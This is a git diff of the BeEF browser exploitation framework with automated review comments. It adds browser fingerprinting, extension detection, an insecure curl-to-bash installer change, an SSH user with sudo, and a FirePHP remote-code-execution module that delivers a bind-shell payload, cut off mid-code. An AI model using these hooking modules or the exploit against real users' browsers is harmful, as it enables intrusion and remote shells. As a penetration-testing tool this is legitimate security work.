diff --git a/INSTALL.txt b/INSTALL.txt
index 642103ae9..bc33a4efa 100644
--- a/INSTALL.txt
+++ b/INSTALL.txt
@@ -51,8 +51,8 @@ Installation
- XCode: provides the sqlite support BeEF needs
- Ruby 1.9
- To install RVM and Ruby 1.9.3 on Mac OS:
- $ bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) source ~/.bash_profile
+ To install RVM and Ruby 1.9.3 on Mac OS:
+ $ bash -s stable < <(curl -Ls https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) source ~/.bash_profile
$ rvm install 1.9.3-p484
$ rvm use 1.9.3
diff --git a/README b/README
index 3938d24ff..f37887cb7 100644
--- a/README
+++ b/README
@@ -48,7 +48,7 @@ __The following is for the impatient.__
For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
We also have a Wiki page at https://github.com/beefproject/beef/wiki/Installation
- $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
+ $ bash -s stable < <(curl -Ls https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
Usage
diff --git a/README.mkd b/README.mkd
index 62021dbe6..10d51addc 100644
--- a/README.mkd
+++ b/README.mkd
@@ -48,7 +48,7 @@ __The following is for the impatient.__
For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
We also have a Wiki page at https://github.com/beefproject/beef/wiki/Installation
- $ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
+ $ curl -L https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
Usage
diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index af4e0a7dd..e5da7f047 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -333,12 +333,28 @@ beef.browser = {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && window.navigator.userAgent.match(/Firefox\/29./) != null;
},
+ /**
+ * Returns true if FF30
+ * @example: beef.browser.isFF30()
+ */
+ isFF30: function () {
+ return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && window.navigator.userAgent.match(/Firefox\/30./) != null;
+ },
+
+ /**
+ * Returns true if FF31
+ * @example: beef.browser.isFF31()
+ */
+ isFF31: function () {
+ return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && window.navigator.userAgent.match(/Firefox\/31./) != null;
+ },
+
/**
* Returns true if FF.
* @example: beef.browser.isFF()
*/
isFF: function () {
- return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25() || this.isFF26() || this.isFF27() || this.isFF28() || this.isFF29();
+ return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25() || this.isFF26() || this.isFF27() || this.isFF28() || this.isFF29() || this.isFF30() || this.isFF31();
},
/**
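Review bot: The added `isFF30` and `isFF31` repeat the whole feature-test expression from `isFF29` and differ only in the user-agent pattern, so a later correction to the feature test has to be made in three places. The trailing dot in `/Firefox\/30./` and `/Firefox\/31./` is unescaped and matches any character; if a literal version separator is meant, write `/Firefox\/30\./` and `/Firefox\/31\./`. Moving the shared feature test into one private helper that takes the version pattern would keep each `isFFnn` to a single line. The `beef.browser` object starts and ends outside this hunk.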
@@ -922,6 +938,8 @@ beef.browser = {
FF27: this.isFF27(), // Firefox 27
FF28: this.isFF28(), // Firefox 28
FF29: this.isFF29(), // Firefox 29
+ FF30: this.isFF30(), // Firefox 30
+ FF31: this.isFF31(), // Firefox 31
FF: this.isFF(), // Firefox any version
IE6: this.isIE6(), // Internet Explorer 6
@@ -1274,6 +1292,14 @@ beef.browser = {
return '29'
}
; // Firefox 29
+ if (this.isFF30()) {
+ return '30'
+ }
+ ; // Firefox 30
+ if (this.isFF31()) {
+ return '31'
+ }
+ ; // Firefox 31
if (this.isIE6()) {
return '6'
diff --git a/install-beef b/install-beef
index e24a85fa0..60f1448d1 100644
--- a/install-beef
+++ b/install-beef
@@ -41,7 +41,7 @@ fi
if [ "$OS" == "Darwin" ]; then
echo "Mac OSX Detected"
echo "Installing Ruby Version Manager (RVM) & Ruby 1.9.3.."
- bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer)
+ bash -s stable < <(curl -Ls https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer)
source ~/.bash_login
rvm install 1.9.3-p0 --with-gcc=clang
rvm use 1.9.3-p0
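Review bot: With `-L` added, the `curl -Ls ... | bash -s stable` line now runs whatever the final redirect target returns, and nothing limits the redirect to HTTPS or checks the installer before it is executed. Restricting the protocols is a small change: `curl -Ls --proto '=https' --proto-redir '=https' https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer`. Because the URL points at `master`, the content can change between runs; saving the script to a file and verifying it against a published checksum or signature before running it would be safer than process substitution. The same applies to the `curl -Lsk ... | bash` line in the Debian hunk below.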
@@ -78,7 +78,7 @@ if [ "$Distro" == "Debian" ]; then
sudo apt-get install build-essential openssl libreadline6 libreadline6-dev zlib1g zlib1g-dev libssl-dev libyaml-dev libsqlite3-0 libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev autoconf libc6-dev libncurses5-dev automake libtool bison subversion
-curl -sk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash
+curl -Lsk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash
echo '[[ -s "$HOME/.rvm/scripts/rvm" ]] && . "$HOME/.rvm/scripts/rvm"' >> ~/.bashrc
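Review bot: The changed line keeps `-k`, so certificate verification stays off for a script that is piped straight into `bash`, and with `-L` every redirect hop is now fetched unverified as well. Anyone able to intercept the connection can substitute the installer. Drop the flag: `curl -Ls https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash`. If the build host lacks a CA bundle, installing one is the fix rather than disabling verification.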
diff --git a/liveCD/BeEFLive.sh b/liveCD/BeEFLive.sh
index 9a2fa45e4..04ec5993a 100644
--- a/liveCD/BeEFLive.sh
+++ b/liveCD/BeEFLive.sh
@@ -175,6 +175,14 @@ show_menu() {
sudo ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key -N ''
sudo ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key -N ''
echo ""
+ echo "Creating beef user..."
+ sudo useradd -d /home/beef -m beef
+ sudo adduser beef sudo
+ sudo chsh -s /bin/bash beef
+ sudo chown -R beef:beef /opt/beef/
+ sudo chown -R beef:beef /opt/metasploit-framework/
+ sudo chown -R beef:beef /opt/sqlmap/
+ echo ""
echo "Please provide a password for ssh user: beef"
sudo passwd beef
echo "ssh enabled"
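Review bot: `sudo adduser beef sudo` puts the account that is about to be exposed over SSH into the `sudo` group, so the password typed at the following `passwd` prompt is the only thing between a remote login and root. If the account only needs to run the tools under `/opt`, the three `chown -R beef:beef` lines already cover that and the group membership can be left out or made an explicit opt-in prompt. None of the added commands check for failure, and `useradd` will error if this branch is run a second time; a guard such as `id beef >/dev/null 2>&1 || sudo useradd -d /home/beef -m beef` avoids that. `show_menu` starts and ends outside this hunk.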
diff --git a/modules/browser/detect_evernote_clipper/command.js b/modules/browser/detect_evernote_clipper/command.js
new file mode 100644
index 000000000..e27a44e3f
--- /dev/null
+++ b/modules/browser/detect_evernote_clipper/command.js
@@ -0,0 +1,34 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+ var result = "";
+
+ var s = document.createElement('script');
+ s.onload = function() {
+ result = "Detected through presense of extension content script.";
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "evernote_clipper="+result);
+ }
+ s.src = 'chrome-extension://pioclpoplcdbaefihamjohnefbikjilc/content/frame.js';
+ document.body.appendChild(s);
+
+ var evdiv = document.getElementById('evernoteGlobalTools');
+ if (typeof(evdiv) != 'undefined' && evdiv != null) {
+ // Evernote Web Clipper must have been active as well, because we can detect one of the iFrames
+ iframeresult = "Detected evernoteGlobalTools iFrame. Looks like the Web Clipper has been used on this page";
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "evernote_clipper="+iframeresult);
+ }
+
+
+ setTimeout(function() {
+ if (result == "") {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "evernote_clipper=Not Detected");
+ }
+ document.body.removeChild(s);
+ }, 2000);
+
+});
+
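Review bot: `iframeresult` is assigned without `var`, so it becomes an implicit global on the page instead of a local of the `beef.execute` callback; declare it with `var iframeresult = ...`. The iframe branch also leaves `result` empty, so when `evernoteGlobalTools` is found but the script never loads, the timeout still sends `evernote_clipper=Not Detected` after the positive report; setting `result = iframeresult;` in that branch keeps the two reports consistent. The string "presense" in the `onload` message is a typo for "presence". A short header comment stating that the check depends on the extension exposing `content/frame.js` to web pages would help readers understand when it stops working.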
diff --git a/modules/browser/detect_evernote_clipper/config.yaml b/modules/browser/detect_evernote_clipper/config.yaml
new file mode 100644
index 000000000..ac9006872
--- /dev/null
+++ b/modules/browser/detect_evernote_clipper/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ detect_evernote_clipper:
+ enable: true
+ category: "Browser"
+ name: "Detect Evernote Web Clipper"
+ description: "This module checks if the Evernote Web Clipper extension is installed and active."
+ authors: ["xntrik"]
+ target:
+ not_working: ["IE"]
+ working: ["C"]
diff --git a/modules/browser/detect_evernote_clipper/module.rb b/modules/browser/detect_evernote_clipper/module.rb
new file mode 100644
index 000000000..1ec206ee3
--- /dev/null
+++ b/modules/browser/detect_evernote_clipper/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_evernote_clipper < BeEF::Core::Command
+
+ def post_execute
+ content = {}
+ content['evernote_clipper'] = @datastore['evernote_clipper'] if not @datastore['evernote_clipper'].nil?
+ save content
+ end
+
+end
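Review bot: `post_execute` stores `@datastore['evernote_clipper']` exactly as received, and that value originates in the hooked browser, so it should be treated as untrusted text. How `save` and the admin UI render it is not visible here; a comment such as `# value comes from the hooked browser; escape before display` would record the assumption. The guard `if not @datastore['evernote_clipper'].nil?` reads more naturally as `unless @datastore['evernote_clipper'].nil?`. The class also has no comment describing what the module stores. The same points apply to `post_execute` in modules/browser/remove_hook_element/module.rb.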
diff --git a/modules/browser/hooked_domain/rickroll/command.js b/modules/browser/hooked_domain/rickroll/command.js
index b6c6b5465..f143d1056 100644
--- a/modules/browser/hooked_domain/rickroll/command.js
+++ b/modules/browser/hooked_domain/rickroll/command.js
@@ -9,8 +9,7 @@ beef.execute(function() {
$j('body').css({'padding':'0px', 'margin':'0px', 'height':'100%'});
$j('html').css({'padding':'0px', 'margin':'0px', 'height':'100%'});
-
- $j('body').html('');
-
+
+ $j('body').html('');
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Rickroll Successful");
});
diff --git a/modules/browser/remove_hook_element/command.js b/modules/browser/remove_hook_element/command.js
new file mode 100644
index 000000000..4fb39fe42
--- /dev/null
+++ b/modules/browser/remove_hook_element/command.js
@@ -0,0 +1,29 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ /**
+ * Removes the BeEF hook.js
+ * @return: true if the hook.js script is removed from the DOM
+ */
+ var removeHookElem = function() {
+ var removedFrames = $j('script[src*="'+beef.net.hook+'"]').remove();
+ if (removedFrames.length > 0) {
+ return true;
+ } else {
+ return false;
+ }
+ }
+
+ if (removeHookElem() == true) {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=successfully removed the hook script element");
+ } else {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=something did not work");
+ }
+
+});
+
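Review bot: In `removeHookElem` the variable `removedFrames` holds the removed `script` elements, not frames, and the `if`/`else` returning `true`/`false` can be `return removedScripts.length > 0;`. The caller's `removeHookElem() == true` can then be just `if (removeHookElem())`. The failure message `result=something did not work` does not say that no matching script element was found, which is the only failure this code can observe; `result=no hook script element found` would be more accurate.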
diff --git a/modules/browser/remove_hook_element/config.yaml b/modules/browser/remove_hook_element/config.yaml
new file mode 100644
index 000000000..15a2b06dd
--- /dev/null
+++ b/modules/browser/remove_hook_element/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ remove_hook_element:
+ enable: true
+ category: "Browser"
+ name: "Remove Hook Element"
+ description: "This module removes the BeEF hook script element from the hooked page, but the underlying BeEF DOM object remains."
+ authors: ["xntrik"]
+ target:
+ working: ["All"]
diff --git a/modules/browser/remove_hook_element/module.rb b/modules/browser/remove_hook_element/module.rb
new file mode 100644
index 000000000..bd20f1f27
--- /dev/null
+++ b/modules/browser/remove_hook_element/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Remove_hook_element < BeEF::Core::Command
+
+ def post_execute
+ content = {}
+ content["result"] = @datastore["result"] if not @datastore["result"].nil?
+ save content
+ end
+
+end
diff --git a/modules/exploits/firephp/command.js b/modules/exploits/firephp/command.js
new file mode 100644
index 000000000..4272f9dd7
--- /dev/null
+++ b/modules/exploits/firephp/command.js
@@ -0,0 +1,26 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ // detect firebug
+ if (window.console && (window.console.firebug || window.console.exception)) {
+ var firephp_<%= @command_id %> = beef.dom.createInvisibleIframe();
+ firephp_<%= @command_id %>.src = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port + "/firephp";
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+ } else {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "error=Module did not run. Firebug is not open in the hooked browser.");
+ return;
+ }
+
+ // clean up
+ cleanup = function() {
+ document.body.removeChild(firephp_<%= @command_id %>);
+ }
+ setTimeout("cleanup()", 10000);
+
+});
+
diff --git a/modules/exploits/firephp/config.yaml b/modules/exploits/firephp/config.yaml
new file mode 100644
index 000000000..ba97cfdd7
--- /dev/null
+++ b/modules/exploits/firephp/config.yaml
@@ -0,0 +1,19 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+###
+# Exploit: http://www.justanotherhacker.com/advisories/jahx132.html
+###
+beef:
+ module:
+ firephp_code_exec:
+ enable: true
+ category: "Exploits"
+ name: "Firephp 0.7.1 RCE"
+ description: "Exploit FirePHP <= 0.7.1 to execute arbitrary JavaScript within the trusted 'chrome://' zone.
This module forces the browser to load '/firephp' on the BeEF server.
The payload is executed silently once the user moves the mouse over the array returned for 'http://[BeEF]/firephp' in Firebug.
Note: Use msfpayload to generate JavaScript payloads. The default payload binds a shell on port 4444.
See 'modules/exploits/firephp/payload.js'"
+ authors: ["Wireghoul", "bcoles"]
+ target:
+ user_notify: ["FF"]
+ not_working: ["All"]
diff --git a/modules/exploits/firephp/module.rb b/modules/exploits/firephp/module.rb
new file mode 100644
index 000000000..e5404974d
--- /dev/null
+++ b/modules/exploits/firephp/module.rb
@@ -0,0 +1,59 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# PoC by Wireghoul: http://www.justanotherhacker.com/advisories/jahx132.html
+###
+class Firephp_code_exec < BeEF::Core::Command
+
+ def pre_send
+ rand_str = rand(32**10).to_s(32)
+
+ # load payload.js file
+ # generate payload:
+ # msfpayload firefox/shell_bind_tcp LPORT=4444 R > payload.js
+ payload = ""
+ f = File.open("#{$root_dir}/modules/exploits/firephp/payload.js")
+ f.each_line do |line|
+ payload << line
+ end
+ f.close
+
+ # construct exploit+payload HTTP response
+ exploit = {
+ "RequestHeaders" => {
+ "1"=>"#{rand(10)}",
+ "2"=>"#{rand(10)}",
+ "3"=>"#{rand(10)}",
+ "4"=>"#{rand(10)}",
+ "5"=>"#{rand(10)}",
+ "6"=>"#{rand(10)}",
+ "7"=>"#{rand(10)}",
+ "8"=>"#{rand(10)}",
+ "9"=>"#{rand(10)}",
+ "
+
+